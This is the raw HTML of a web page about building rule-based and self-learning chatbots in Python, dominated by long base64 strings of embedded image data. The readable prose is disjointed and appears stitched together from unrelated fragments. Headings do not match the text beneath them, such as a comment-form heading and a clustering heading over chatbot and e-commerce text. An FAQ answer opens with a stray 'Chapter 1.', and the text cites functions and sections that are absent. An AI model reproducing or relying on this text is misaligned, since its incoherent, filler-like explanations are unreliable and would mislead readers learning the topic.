\/Uu7n3FPOVFsqWSo4YQOSfqjGdRbrP9II\/sEfsiO99D0d5KMK5e8BHMBTkeEUz84l1\/lBH9gj9kPGpF2D\/AB9H9gj9kO99D0d5IArdUSk5zDkkKSSrmKfVqLdaxhU+j+wR+yGfODdP+Xo\/sUfsh3voejvJC1W85jwjAoAGKp+cG6T\/AEgj+wR+yG\/L65z1n0Ef\/RR+yJ730PR3ko3Va+RGTOUxUfy8uXPE6gf9ij9kL8vrnH+Po\/sUfsiO99D0d5Juq1Vq5xGIrirTflyk5M6j+xR+yEN8XGf8dR9jKP2Q730PR3km6rSJzCRVvy3uL\/LR\/ZI\/ZB8t7i\/y0f2SP2Q730HR3km6rQ6qxDiznqIq0XxcY\/x4f2SP2Q75dXH\/AJcP7JH7InvfQdHeSbqj8EEEeYqtEEEEERBBBBEQQQQREEEEERBBBBEQQQQREEEEERBBBBEQQQQREEEEERBBBBEQQQQREEEEERBBBBEQQQQREEEEERBBBBEQQQQREEEEERBBBBEQQQQREEEEERBBBBEQQQQREEEEERBBBBEQQQQREEEEERBBBBEQQQQREEEEERBBBBEQQQQREEEEERBBBBEQQQQREEEEERBBBBEQQQQREEEEERBBBBEQQQQREEEEERBBBBEQQQQREEEEERBBBBF\/\/9k=\" width=\"309px\" alt=\"rule based chatbot python\"\/><\/p>\n<p><p>For the self-learned version, Neural networks are used to train the chatbots to reply to a user, based on some training set of interaction. For the task parts, we will be using a rule-based approach and for the general interactions, we will use a self-learned approach. I found this combined approach much effective than a fully self-learned approach. The chatbot we\u2019ve built is relatively simple, but there are much more complex things you can try when building your own chatbot in Python. You can build a chatbot that can provide answers to your customers\u2019 queries, take payments, recommend products, or even direct incoming calls.<\/p>\n<\/p>\n<p><p>Rule-based chatbots can\u2019t comprehend a natural conversation, but they can follow a rule-based matrix to guide users to a specific action or information. The bot provides branching questions to help users select the desired day, time, movie, and mode of payment. Many organizations also employ rule-based chatbots to answer the FAQs of users to automate the process. Rule-based chatbots are pretty straight forward as compared to learning-based chatbots. If the user query matches any rule, the answer to the query is generated, otherwise the user is notified that the answer to user query doesn&#8217;t exist.<\/p>\n<\/p>\n<p><h2>Leave a Reply Your email address will not be published. Required fields are marked *<\/h2>\n<\/p>\n<p><p>Ensure that it can provide accurate information and adapt to changing circumstances or product offerings. Track user interactions, gather feedback, and analyze performance metrics. Use this data to make iterative improvements and enhance the chatbot\u2019s capabilities. In the above, we have created two functions, \u201cgreet_res()\u201d to greet the user based on bot_greet and usr_greet lists and \u201csend_msz()\u201d to send the message to the user. Corpus can be created or designed either manually or by using the accumulated data over time through the chatbot. Ochatbot, Botisfy, Chatfuel, and Tidio are the four best examples of artificial intelligence-powered chatbots.<\/p>\n<\/p>\n<div itemScope itemProp=\"mainEntity\" itemType=\"https:\/\/schema.org\/Question\">\n<div itemProp=\"name\">\n<h2>What is a rule-based algorithm?<\/h2>\n<\/div>\n<div itemScope itemProp=\"acceptedAnswer\" itemType=\"https:\/\/schema.org\/Answer\">\n<div itemProp=\"text\">\n<p>Chapter 1. These algorithms extract knowledges in the form of rules from the classification model, which are easy to comprehend and very expressive. This algorithm is most suitable for analyzing data containing a mixture of numerical and qualitative attributes.<\/p>\n<\/div><\/div>\n<\/div>\n<p><p>In chatbots design, an intent is the purpose or category of the user query. In rule-based chatbots, you can use regular expressions to match a user\u2019s statement to a chatbot intent. On the other hand, if the input text is not equal to &#8220;bye&#8221;, it is checked if the input contains words like &#8220;thanks&#8221;, &#8220;thank you&#8221;, etc. or not. Otherwise, if the user input is not equal to None, the generate_response method  is called which fetches the user response based on the cosine similarity as explained in the last section.<\/p>\n<\/p>\n<p><h2>Application of Clustering in Data Science Using Real-Time Examples<\/h2>\n<\/p>\n<p><p>When shopping, a customer surfs different websites to find the best value. An effective e-commerce website will resolve customers\u2019 questions instead of losing sales. When the customers don\u2019t get answers instantly, they might seek the products elsewhere. People appreciate the transparency of what a chatbot can and can&#8217;t do. By providing buttons and a clear pathway for the customer, things tend to run more smoothly.<\/p>\n<\/p>\n<p><img decoding=\"async\" class='aligncenter' style='display: block;margin-left:auto;margin-right:auto;' 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5VUExkdsjtSy3bRyFAO1WRGEk+H598VLvDuIbbn61YAPCgmOVEkpWLeFzkZot5jIvVenrTuY9nX7J6VEJjIxGR071KjhaueVSbtvFCbelWXEpiTeoyagmAS7dp3etWSlNnzjIqmJFKXBtVwTmVNzLjAzSR3LtKV29Cf8AKrkCbAUHynvSK0Bkwh6jpUq6VMwLUT3DROoCnBpllJi8Tb1PlUymEEeIfupl8Pw8jqPpSoFKXPKpguGllIK4A6UXF00ThQpINPEYdx2d+9EpiyNw61YG7hS45TNIRFvA64qu1uGmLBlxVpKBMkfLilh8M58NcVkAQaVuRape4dX2BT0OBVlxKyIGVT171LGDftYjd3p5PDC\/P2NWpFJcG0kMxkUkjqtVx3TtKYyhxV0ZjI\/d9j3pUMPiHA+akCeFbpRcztCBtXNNHKXi37etTMYwP3gzUxlNmV6ClbeEueVRFO7TEYOPP6U007RttVenemRoWf8Ad9z3qZDCDhyM1anhS4orH+Lf+GirM23qKK1I8Keryojstjhwe1NPb+L3P4VVDNOZsMDjzHpT3UkiMArY6ZqercEqFasW2Hw+1JDb+Gc7yfvqyMsYdxPUiqbaWSRiHbP4VkTBWjEhTNbtIwJbp9KseHxIthP0qi5kkjcbWIrIkZvB3KeuM0MwEESUlvbmEEZpJLPfIX9aLSSR872z50sksouNofA8lx3rVys1CvniEiBc9qiC38JSAR186Lp3SMFTjNLavI0RZmyRWYO1X+pQINsm7caa4heXBDYxWOtxMZtu\/p9wov7iaLbsU9e9b2kkLBeA0lZSpiLwwc1VDbeE5bPeqorhjBvY5NYdtqTz3LxJKjNH0kVT1Q+QPpQNJBKyczKHdclcW\/jMDmrPDxF4efKuJuNU3ytHBKNydGAKnB+uKyI9SjntmmhlR9vynaQcHz7GqcbgAstz43EgFZcEDxsW3ZzUPBufcWNUWdxI7tuYkDrilmu5RLtV8D7hU2uDoW\/mNABKzJofFjC+lEEPhLtz3qm4ndYAwOD60Wlwzqdxzis2GSVv5jS4BT8HibxNw71bPB4q4zWGbqX4jZ4jYz2q27uHRBtbb91aLTICyHtLS7sFfDD4UZXNJHaskhYP0NRbTs0O52JJHc1RBcyPMQz9M1mHGQnzG1CyZ4d5GWIp\/D3RbO\/TFYt5cyxkbXwPupkuXaEtuwwHWrBIpUvbuIKtggMJNLJaGSQv61TaXTux8V+n1pbi7lWcKsm0eQ9au126FDkbCzXj3R+H6Clt7fwckY61VNOwg3BsN51XZXLyA7myQam1xaYV+Y0OA7q9oMzeIGPWnmhaRcbqxHu5hclN\/wAo8sCrLqd1jyr9T502mlPmMtXww+HH4e\/P31XFabJt+fr2pLe5Z4cucmqYryQ3G1pCRnGKQ6SE3tqFmXNt4xU5Axmnji2Q7M1iXl1KpXY5UEdSPKro5n8DcTk471kg7QVre2SFMNt4chfpRNb75N+4j6VVazyyTFWbI+vSmuZZkkwj4H3CtQd0KSC2lc8TNFsDY+tLBCYs5bOamR3Fvv3dcUtpI75DHOKyAYK1UhK1oWl8T61bNCZI9uaokmmFwFDdM9sVbcO6xZXoT\/lWrkKVCa3g8FNue9VLaskhYSZz609s8jR5ZsmqVlla4AL9CcVADasgwr5ofEABY9KZI8RlM5z61XcyPGBsOM\/Snidmi3E9cd6l7UEB0KuG18Jyc0T2plbd9KS3llaXDPkE+lNdSyoyhWx+FauVKhV\/AGim8Wb1orfqWa8K1J4WYADqaaaZIwNwzSR2aI4bJOKaaESHy7Yrj9MrcGEwkTZuXtURTRyMVUg4qVjXw\/DwMDvURwJGxZMVkRBWjMhRLMiMFOOvmacyqse49R9KSWBXIPT8aZoVaPwj2x3FCRAUuSiGWN87MCkeeEORjJHnU29usP2Tk\/WlezjZy27Ga16ZUEwrJZUjXc38vWoikikXclEkQlQBsZFEUQiQp0yazUKwdyoa7jMnhgrk9K8W490qbirnZacMXPEev6fYLw7JemPS9Re33SrOqgnacHo\/pXtLWsYcSdMg5rxbjrXbThTnjZ6\/rNlqL6eeHJLPxbSyluCJWuFYAhFPkp\/yr2ekXmcGfu2Oj6x2918v8TEfpsfzP2\/MZPPE3Psqb5eI+TmraLe2\/Fuqa7wtq2oRadeW2rSiea1kkzsljlI3YBGCpz5feK9Z4oi0i55lzcF8LuNZtfhjeXQvdnjB7UP4wDfKpjDfZXvjNGq3urc59U0TQ9D4f1PT+GtM1CLUr\/UdStmtzcGMEpFEjYZssQScDGP5w2kX36a5xsLGcJPBbrbfuzib\/wBnqDsP+Lr06ede1ix4\/wD9EfMAEjif5jQN0d4mfyV8lqXZjI0Zd8nc7aTJg\/KcXbZkgSAB+AuiC54i4Y5DXNxpHBj2Daxa2z3erLqoknnWUJmcqclSxcrtH2Q30r0rQuJ7XldwJY2v6hyWF\/qV58Pp2jWl2tzLfSsg\/eGTOF6Ali3bH3Vx\/E2k38ns06dax2Nw14NF0tGgEZ8TIMORt75GDn7qzeb\/AAvfzNwfxbbWGpXlrw\/M\/wAfb6dI6Xawyx7DJFtIbKnGQvUgmmTPh1gDMggF7ybNwBtHP2H9ljT6fV9O3Z8BJLcWMCQIAcTuIrkcn+65vTOaus2evabw9x7wYdC\/TMng2N3FeJcwPNjIhZhgoxA6dME9qwf7aNbv+KNW4U4b5f3WqXOk6iLS4mFwkcMcPT94ztgbjk4TqehNdVtrbh\/jTinh6x4V0jifXbfT76O\/vLzVry+itrHwzlSFlIDy56Beo7588dq5VaRcRcV8wLi7tJYFn18vFvUqsq+GMEHzFdTJp9JhY7I9kEN4nvuAmJkV2K9PTa3qWpyMwMyegvjdAMjZMTAHPcCuFn6hzT1u\/wBb1HR+A+C31xNHf4e9vJr1be3E+NxhQnJdhkZ6AA9Kx5+eNjBwDq3F36FuYb3RLlLLUNKuHVJLeZpFQruUEEYfcGGcj0NdDs9K0jl9rfEml8cy8WWcV\/qs2pafeaTJeG3uI5SDtxbnAkUgg7gM1RqfDt\/Pyj4v1m34U1SxbWdTsmt0u7ia4vbqGO4iVZZVckoSAenoPTFcn6HR7mgt9MsgzzMTN+J4FQuv\/F+qQ5wd64fLYnaQDEANkXHJvsu96rzn4k0GKHiLWOXNza8MSyIr3vxiNcxRuQFleEfZBJHTORnyPSue4z5nvoupWHD3DGgTcQ63qNubqO1SZYkjtxgeK7t0Vc9B6kGuP5v6ZNNyi1+C0t5Zrg6cAsKRlnY\/KcADqa63qQuuBeNtK451fSNRutF1Lh220y6mtbZp3spYyzguigtsYMR0HcVx4dNpM7BkDAHDcAJ\/dABH\/J4iYXb1Wt6jo8hxHIS07CXFv7Q4kOiB7DmYm6XceEuaFzqOs3XC3FfDE\/DurW1t8YqPOs0M9vnDSRyr0ODjI7iuJh5vcV6xby69wfy1uNS0GNnMNw99HBPdopIaSGJh1XoSMkZqdF4oveY+oalY6Hw7c2\/Dq6fJANWvrR7eWaeQYCxI4DbAOpyO+K894buNC4Q4ci4W4stuP7XX9LjNmllZTX7RXTKMK0DRHw9r9MdRjJHlRmjwGT8sbq9MzE8nmR25JjuuPN1bWDaG5Scfqh+2CSIgWCD9gN3Ze8cOcYaTxXoNlxFpkjtb30W9A6gOpyQysPJgQQfuNeQ8P8Y69pPM7mLp\/DfDN1r1\/cX9q6RfEiGGCNYOrO7HA6kAAAknPToTXofK7hiXQ+BdMsLjSDpE7LNcS2huHnMbSyO+1nclmb5uvXoSR2FeeaJxE3A3MjmHfa3oOq\/oW+vrYfHW1lJMY3EIxkICxQ5PUA4Iwe9cenx4A7UMYNwAoE8+se914NrtdQz6p2LRZczthJlxA4\/luk2KvyF3ng7mvFrl1quicT6HPw9rOjQi5uoJpFeMwHP72ORejL069q4ZOcXFl9YPxNovLC7u9AjYvHO19GtzPAO8qQnrjGSASCa4Ox0vUuavE3EnEFhpt7pmjS8OzaDY3V9A0D3cspZjIEb5ti5x1H+8DgdO1HQ9I4Yh0TW9N5gR8S2cAtm0m2nvik8qjaDE6HwvDbpg56DHTtntfotKHS1sn0y2T6ZF9wfya7rzH9X6iWBr3kMG7a+AC6DXYj7ADdyF2TmVzK4iuJOBdW4Fsp7jStUvoJkdb0Q\/Fswb\/gzqewwASTkZ6eVd10XmJqd1xbZcI69w3+i7u80o6grLdLIN6yFXiGAASBtbdn\/EOldC4l4d1LhbgPl9dtw1cQx8ParBd6hY2LvdvbxsGL4Jyz7S3Ws\/mNqkkekcMc2OGdO1G+\/RtxMDB8KyTvBNEyEFGG4DeIz19Kw7TafPjx4mNEHeA6bmTtm4\/wCltut1+ly5tU95r5biyKLYG6Knyuz8N83LDiPjnWeDhpssA0zcbW6ZspdCNtkpUY\/wtgdzVE\/Oiyh0LUNbk0S4lCazJoumWtuwkl1GZWC5TOAo3bwc5wEJya6ZrvDWr8uuDOEuMLPTZr3UtHMg1KGGPdJJ8WuZu3f96UP4VOv8Aaxp3Lbgq6hsb+8n4euY9S1K3smKXUviq\/jmPaQS6mQtgHJwRVOi6e5zXNPpcdovuJn\/AHen8mFr+K9aZjfjcPU0bjDezo2\/7fV+Au42nNTX9O1TTrHjfgc6LZ6xOtpbXsN5HcxpcN9mKXaAVLdgeoz0zVmq80tVn4ju+GOBeD21y40sKL+eS6S3t4XYZWIOclnx1IAwMjrXQZV4Z4x1PRdF4V0nizXAuoQXN7Jql3fxW1kkbbi7eKQGkBAwoyM96JLDTeBuM+JE41HFVrYaxffpKw1DSZbvwZAyKrROsByJFKHBIyRj6Zn6LTRuLIfH7exuJiZ4mp91k9X6hTBknHuAL6kUTzt22YuDHC7v\/bVaxcH8Ra3e8PXFnrHDAxqGkzyL4iMeqEMuQyMMkMO+DWLfc5+KdN0aLjI8tLtuGRGk81wL2M3CREAtKIT12DPTJBIGSAK6Re8PTahy+5jcU6fwpqlqNWtY4LKS\/nnnvb+OIECRkkJKD5sKO5Hfyr0ziSxuW5EajYJbyfEHhiREh2kuX+G+zj1z0xWH6fR4y2G8vAIJ4ECYg9iTEz7rtYNZ1XUMe75hG3GXCGj1EOcBMjuBYAE8hd90fVrHWbK21CykEkN1Ek0Ug7OjAEEfeCKzZLiONwjEV1LlTZS2fL7hkXEbrMuk2qujrgofCUEY8vurtslukjbm7189nxsx5nMaaBI\/C+30WTJl0zMmQWQJ\/HhXFl2bunaq4pVkzjAPmKdolZApOAKSCBYdxByTXBIAK7cGQgzRB8MvXOM4p5ZERMnBHp61W1rGzb2Y5zk080KyJtboB2q1ISDBRFKjrlB0pFnjMhUEffTQwrAAoOc96VLdFkLdOvWgi0INJppkiUFiKlHjePf0xUSwLKBuHamWNUTaB0qSNqCSVXFcQuxVcZHb61Ms8aHa4ye\/aoitlR9xwcUS2ySsWZiKtSpDoS\/FQ\/wn+VFL8DD\/ABGit0uP1JYTc+Ku9jt86e58XI2jpnvTJcq7BB3NTPMkZwe\/epc8LkqOUwMngnp1qm0EwkO\/tWQsqmPxfpSRXKSsVXvWbg0rUi1XdCUuNmcU7+L4HTuKmW4SFgredM0yCMyeWKSYFJAnlV23iFcuO5quXxvFbaDiroJ1k6L99K13GHK+lakzwsgDbyou\/E2Hw\/SpgZxF+86HFNNKIkGT1PSsC+1mxsNOuNUvrlLe2s0aWaVuyooySaNDngNAWcmRuOXONBSGm8Y57fWl1HxCuI+vSvNbPn3Y30f6WTgniSPQXOI9VktVERXycru3iM\/xYIAPWu08I8dWHG3C9lxTp1vLBBfBykc2N67JGQ5wSP8ADn8a7+TQ6nB6sjIEx\/bj60V42Dq2i1pOLDkDib72B3A8WLXPR+KLZe3iYye2ceVUWjS+JtkOfI5Fa9x33M3jnmnxnw\/onMm90O00aSN4IhAkihWH2QMZHYnv51kcCc8eItA0Xi+Lj6U63LwhdJA11bKiNcK8pj8sLkEA+XToc167\/h7UNYSxzXOhpLRM+uI5EHkCivmsXxlo3ZQzMxzGS8BxjaSyd3BkcHstgboymXajnbjAI6U5DmDcD84GK6br3M6w0PgIcfSadNNamzgvPARh4gWUphcnpkbx\/KvMeOOOdS1TmPyr1TTNQvrPT9ajiupbVZ2VXVypCuqnDdDiunpOk59UeIA3WfLRJH1Xqa\/4i0ehEg7nHZQow87QfpK97sg+T4nQHypphM1wGXO0eQ7V5ZxB7QOkaXrl1w\/oPDGs8RXWnYF6dNg8RID5gkZ6jz8gcjOQQOz8H82+EuM9FTWtOvBbKXMU0F4VikhkAyVYE\/UdjjrXHl6brcTRmdjO08ffyOR7TyubB13pmfJ+nZlG4dvpzfBjvHC7feBzCHQAk4BGOwqu1MhUh8gZ6ZNYq8RaPc\/u7PU7eeXaTsilV2H1wDWs\/BmscyuOjxJez86LjRF0q8mjhimjiwyjcRnoMAYx59q5tD0nLrMb3FwYGRMg9zAgAErrdW+IdP01+NrG\/MOTd+3bHpAJskBbOhpzN2fOeo\/w4q+9L7UWNu\/U46V4dyx53Xqcsb3ivmPdmT9GXbWsd5FCA16AF24UYDMWJGRgefkask9qbQbbTH1LUeDdes0IV7UzwhUuwWAOxz0yAd2PQHrXK\/oOvGVzGY52nbI4J9vP\/pXDj+LeknTty5cuwObug8ge\/iSOeCvb4Q4h+bupGBVMIlM+ZPI9DivPOIeeOm6N+hbKx4f1TWNV1q0F5BYWUYZ1iIzuY9vI\/wAjWTwtzt4S4k0HVdduDPpS6GWGpwXqBJbUjPceecEDHXPTvXTPTdYzH804zBMfkwK+tLvt670t+X5PzRLZPtQB54mIPld+vDKXUK25cYII71Y29rZiergHt0zXi0ftQ6ArxXmocH8R2WizyLHFqs1riFsnAbp3HfsSeh6eVdi5gc7+G+A102F7e41e+1ZRLaWtkAzPGezE\/U9Bjvj6GuQ9G14e3F8o7jx345+kd54XGPibpD8b83zhtbz7TxXJntEyu\/2RdpGDqxQHGT0GaJ45vGYJ1TpjGa15PNq442508C2+nHV9JhX4mHUdLud8JD+GxXenZgRgg\/6q9717ifS+FtLuda1q5S2srKMyzSsMgKB2AHUk5AAHUnAFNZ03PonYw8ep4mPFkR78J0vruk6ozM\/GYZidG48cAz2hcnKrGJj1ywycUlqswz4mducgHOa82XnvaRpa6lrvA3Eej6HfOscOq3UCCFdxwrSAMWjU+RIx1FcPrPH1\/o3PKa3hg1XU4Z+GYGtNNs2L+LMbiT5wpIRflHV2IwB9wPGzpmptjmwYJ\/HI57d\/C1m+INBjDHtdMua33EzBiOKryvXXSdpsl2yT9rPl\/wD7NXXquUDRMQR3x510rhLmtZ8S6te8M6loWo6FrWnos01nfKoZoicB0ZSVZc+lcV\/bpaXkt1caDwTxHquj2cpil1W0tQ8TFT8zRru3SAdclQfoPXH6DVExssR4i+L9+y5\/4104M3fNHqnzMjmuRHdej2qukJZvtE+frVMKSGY+IjEbupb0ryLjzndd3nKzWOJ+Are+imtL1rFb0RRSJAVKEykNkbCG2jIJyewqnjrmDrV7wLoetXdnqXD0kWvaZHM9xKkRng3o0jkxk4jILAg47HpXbxdG1TyA4bdztt8gj2Xnaj4l0ONrhjO7a0Prgixz9l7TcJKGTY+Vx2BrJhJNud\/2wCAD515bc899P0yWC+1ng3iLT9EuZVRNVubYLBhjgO653op6dWA6EVz3GHNHR+FJNPsIrO91jVdUUva6fp8YeVkHeRskBUGR8x6fyOOm7p+pJazZzx9uf\/q9JnWunlrsnzBAiee9Cub7Ryu4WTTKcSk7R3qy4eUyAr2J6V5\/w\/zgtNbu7\/RLnhfV9L16xtWvF0q7jVZbpBk5hYHa\/UY79\/51wnKDmlxVxLdajZa\/w9qroNUvI0u5Y4UitEVvlgbYQSy\/Zzg9fM1XdM1W1+ZzYDYm\/PceeEZ17Quy4sDHzvJseRFHwbC9lLOYen2sUln4wzvHnTJKPCEm4HzqYLlJywXyrzLg0vfEEi1TJ44lyFyN3++rrjxPDG0dTQ10iHae4OKaWZY0DHz7UkyKVgQbSwCUK27v5VXEJxOSwOKuhmEqBge3ekS7V5TGvfNQE3StVaLsy4Ajp4d4h+YdaJp0hHzedSkqyJv8qSdvCtTyseMTiYk\/Zprnxd\/yA4xTQ3KuwX1zTSTrGSp++tSZ4WR+3lYn7\/0oq\/4tKK1J8LMBWJbwKwYDqO1E0cL4EpAwc96pignWQE5wPMnpT3UUr4KDPl3rHflbkRwrQIymxRhfrSwwxRsSjAn6UKsgg2kYPakgjlRyzYxUEwbVMVSaeKJ2DOwGPWrGjjZNrDoOtY9yksjjC5HrV0iO0Oxe\/wBKHgWnfhEUUaZ8PHWlaCFnLEdaW2jeIYcn0qqSKdpGdGOCenWrF8rBMN4WTNGrLtYgA9OtdJ5ucPX\/ABHy04h0DRgWu7yydIQnd2xnb09cYruN3vkjwp6j+dUQRukRDv1z51z6bK7Tvbmby0g\/i11tbp2azDk07qD2kfkLxnT+b3AF\/wAFx6daxTnWDZ\/A\/oE2ricTBCpiKEdFBBy3YDrmuT9n61U8muHkkHh\/LcdD0x+\/kr0SPTIRdm5FtCrt9qQINx\/HH+VXz2wWIRQRKijsoGAK9LNrcTsbsWJpG5wdZmIBECh5Xz+l6VnxZm6rUPB2NLAAIkEizZ8LVS55eXHHfM7mhZ2N3eWuoWgjm094pWjV3x9liOjA4A69s1kcPabpuvezxxLo3DugPZ69Zbf0nbLveWaWOVWL\/NliWVT8vkQQK2hhskhVysKLLJkkhQCw9M9z+NUWmmLBcGXwUj3Z3bQAWPfJ8z19fWvXf8T5Xsa2KYWFt92gC\/IMT7FfPN+A8TMj37reHh1dnmRHgtv6hau8S819C4j5HR8I6RpuqSaxBptrbXiG1YRWyRNGGdpPs4JUAeeWHSsi\/t3bifkf8jnGn2m7oeh2p3rZa60W3JdobOACX7aiNRuOe56dayH0yJoY0EUQkjUBW2DK\/d6fhWR8QYcTNmHHAJebM\/vbt8dkPwdqc7\/manMC4BjRDYpjt3nutTNKki5acX8VaRxnxVxZw29zdvd2k2l20Usd8jFmVtzRP1IYeYAJIPUV2\/lHyf4K460G\/wBY4r4Y1mS3vL4z2p1S7Mckxwd0oEKxYBJ8wQcdOnfYCPSYZj\/w63jkC\/YEqBsH17VbJZss+6IZXyx0AFY1PxA\/M0nFLMjg2XB3+niIjmO5PsubQfBePS5Q7OQ\/E3dDSJ\/dzJJIMT2A9103hbkpy44F1J9a4X4e+Bu3gaBpfi55MxkqxXDuR3VeuPKtYeCpeTtrLxLFzN0S6urt7+Q2jR287sEy2QChAU5x3rdS5jeSFQh69+h64rDttGs1V\/FsoASem6Fev+VcWg65k07ch1DnPLtth0Oozza7XWPhPFqzh\/RsZjazd6S0Fp3AA1I4WoUfD3GvEHIy4uU069n03SNcW70+3mRjI9iFIbaMZZVLA5AP+P0rm+a\/Nvh3j7lX+g+HtFv3uYPhpbpntdsdgEdV+12JYkKMeTE+WK2i+AkSQBY1VA2QQOmPSq7nSrQRPFBYwBXbLxrEuG+p6dfvNegPiTG7M3LkxSWvLmwSAJiZq+OateM74Iy49O\/Bgz09gY6WyTExtuuY70tfOO4uG7CLga\/12HX9Ef8ARMccXEmlsT8M2wZikQKcjz6dfmPkDXBWNvxlzJ5fcd6Dp8z63DZywS2GptZi3lv1SQSNGQFBdiq9M5bJGT1GNpIbGFrY2dwiunfY67gPTv06Utlp\/wAKwWK3SJVOVAHy\/wAh0rr4+v8AysYGyXNIIJMgQ7dVSPBEx3iV2cnwc7NnLjlhjmwQBBMt23ce8xPaYWouo8QcPazwXY8IDiLj7VdTmWG1l4fFvBGkTKR0Dm38mHQZJ6DNdr4mgblFzO4T4v1\/SL660OPQItNMgAne1lVWU5IABIznIxnc2O1bI3Gk25ufi4rSNZSuGdVUE+uT3q+SyjuLI280SSgrja43Dv8AWr\/mDG1w24zsduDhus7qMGIEfQnysN+CchYd2UfMbsLSG16JiQSZ5uwFrPJxXp3HPP8A4F1rQdJvItOQTwRXlxCYzdEJISVHfapOAfXd6V63z34a1LiHlvqEej2j3lzbSwXfwqdWuEicMyAeZwDgeZGK71ZabDBKshtYl8IYj+UDb9BirLi3leVmUZBHQ+h+tdLU9WGXNhfibtGIQJMz6ib48r2ND8OuwaXU49Q\/cc5kwNoBIArleWa9zr4C1nhmDT9G09uJNU1ExwRaB8O3ibyw6Sqy4jC9SWYY6fjRpVuIPaImBtRGIuDrYdOqxn4mTKg\/T\/VXqrafarulgtYBMw+Z1jUMR55PepsbRYpDK6KGxtPyjdjJ6Z9K6n6zDjY4YGkSCLM8\/YeF3P4RqM2XG\/VPBLXNIhsCGz795+nsvKeKNMmveeFtaW7GNrrhS6h39sOZSFOfpnOK4rlrzI4O4P4GseDuLHn0rXdDX4W4sDbSNNJICceEFX97uzkbc5zXs81iz3PxBjUv2DAfMBn1ovdMt5nS4+HjeVT0ZkBZR9DXL\/Ecb8LdPlbQA4PcT7GrXAeh5cWpfq8DwHEukEVDtvF81PvPC1ytdM1HVeQfMSG20aWGeXWruf4MJl0UPE7LgZyQAeg8xXL8w+IND4t5X6HqHC23VRba3pcElqVK7pgyloW3AYzlQc9Bn7695s7VYY2AiRNxLFVGMn6+pqiDS4VcA2kSpv8AEICjG71xiuyOst+ccxZw\/cL81H9uV1f8rZBpxgZkpzNhMeCSCL9+F49zO5m8HcT8CX\/C2hi41HXdahaxg0tbV1uI5n6ASIQNm09ctgdO9Y8kQ5VcxdG1\/i9JP0Pd8L2+iNqKxtIlvdRHLK5AJRWzkMf9xr2u50yBpxdw20XjN8pYIAx\/HvVvw6TWjW86xyAjaQwBH\/2rrs6hixYxiY30mZk3ccGKiF2MvQc+bKc+XIPmDbtr0jb5E3M+R7Lx+z1fTOYfN7h\/V+Co5bzTOG7W7N9qgjZYHeYKEhRiPnPyk9MjrWVye1jRtO13iXgjU7lrbXJOIL+8jtpI2XxIWYMHUkbSCvofKvUdPsEtCfh4FgQDG1RgHr06CrriyRrkXKW8fiKuA+Pm\/nWc+vZkYcAadsAC7ok2Yuye3C5tP0TLizM1ReC\/cXOG2iHBoIAmoDRHNrkkVREUOAoGM00EUaAhCD91UEubbaCCx7\/fRaeIm5nGPLv3rxO3K+rBFUrmggMmSOuc08saOuH7VitBO0\/iAnbn1rIuEleLap6\/SkGRa0DINJooo0XCDo1VrDCshZWXPpmi1iljQq5P4mq1imWfOOgOc1BN2qe1K+eNJAN5A++pRVVNq4I9aS4SR1GzBpolkWIqR1p\/TyqDfCWOOJXJVlJPpTSwxOcuOtUwQzLJlxjH1ouYpXfcmcHp0q9xagIjhN8Nb+n+dFVfCT\/\/ADKK5PuuOR4TxXhebwtox5dKsubho8BUB8+tMnw+\/cuNxolEOR4uPQda45E8Lk7KY5GaLeyjtnpVUE5mJDL0q4BVTo2VxSRCDJEQwfvrI4Kp5CS5uHiYKo6VbJL4cPiY8s0sog3ASjJ++nIVk6kBKp4FIOSqbe4M\/XaBXHavr1po1rc6hqE8Vva2qGSaWQ4VEAyST92a5NfCAPg4wOhxXmvP2wnv+WWtRWNtLcyqsU0kMIy8kKSK0ij1yoPSu1pMLNRqG4n0HEA\/ded1PPk0mjyZ8VuaCY+nCxIfaF4Ju0a7S21y2sirGDULjTJY7W4wCcJIRjccdAcZPSs+4508FWen6Bqeo3F1Hb8SQvcWMngFvlVAx3AZIJBGB1JJwOtdd4x5j8s9Y5V30Oma1p14l5prw2thA6NMW2Hangj5lK9CcjpjriumaLDBL\/YHFNErqbWZgG6\/MLdSD\/MZr3mdN0zse97HMguEE+Gk+B3C+Ky9d1zMwxY8rHy1pBA4JeG3B8Fep8N84+HeI+Il4Zax1bSr+ZDJaw6rZPaNcIO5j39+nXHQ9+nQ1PFfObhjhnW24cEGq6rqEChrmDS7CS6a2UjIMm0dPu79vWuv84I7dOM+W0yIqXC8RCPePtbGjO5fuOBn7q4zllrvDvCHEXG3D\/GWrWemazJrt1f7r2ZYvibSQ5idGfG5VU46Hp2rDNDp3YhqWsJ9M7Z77tszEwubJ1fW4tR+iyZGtO6N5FAbdwETyTUzwPK7Dy+49l4v5icSCw1V73R4tN0+ezi24EbsJBJ0IBDErgg9QRggV2birmPw7wTpy6lxNcmBJZRBBFFGZJp5T2SNF6se\/btjJxXQOVep6NrXN\/jrVOHoiLG4tbFo5QmxZ8eIrSpnupIOG7NjIyDk2c0rzTNA5pcD8Wa6qpolv8VaPcuP3Vrcug2O\/oDgjJ6Dv0xTNo8L9YMO0gbGmO8hsx9SrpeqanF0t2o3gk5CJMloBfExPA58Lmk58cIyG1gns9Z067uruG0S0v8ATZIJ90mdrbW7p8p+YE46Z71m6xzo4R0fU7\/QRb6tfarp7RI9lYWD3Esm+MOCgXPygEZY4AJAzkiuhc5+KOEeINX4IstG1Cy1K6g4htZHuLaVZVhiO75GdT3c4IUnqEJ8q7PwDBb\/ANsHMi4MS+IjabGXx12\/CqcZqv0Gmbh\/UOY4ekmJ77w3xPf6rDOsdQyas6NmVrpcG7oq2F3ExyPMLtnAvMXQ+YNncXGkm4SWzk8K6tbiEwzQP\/C6Ht\/9\/Q1dxhxVDwroOo65cqohsLd5zk9yB0H4nA\/Gum8ICNOe\/G8VuoRH03TJWVem58OMn64UD8K6r7UOrX1\/Z6Jy20KHxtS4ivVLwq+C0SN8qknoAXwc+Wys6bpuHUdSx4G0xwa4z2BEm\/a7XPqut6jTdGy6nIQcrC5ogcuktED3qkvJTnLxlxTrd1oPHUcXxN1YR6npoWIR74Gbr27jBX+RrsWmcwuJbrn\/AHnAk15F+hY9HF2kPhKCJP3fzb8bsfMehPnXk\/G8vHvB\/EXCHMDiHgmz0G00OSLTGNrfC4EsJBBRgACo2b8eWTXYX0fTeLfaR1jRp5plstR4Wx4lvIUfY3hfZby++voNT0\/Rvc\/UhjQx2Nx9MODXNIFQYmIP3Xxmj611HGzFpHZHHK3Mz90tLmuBImRxMj7LYI6nGZAm+PbnHfsc14nx5xtzPuecT8v+CeI7LTYP0cl2Dc2aSAd93UqT16fyrn9P9nPgbS9RtdQt9a4heW1mSWNZNSJUspBAIx1GRXmv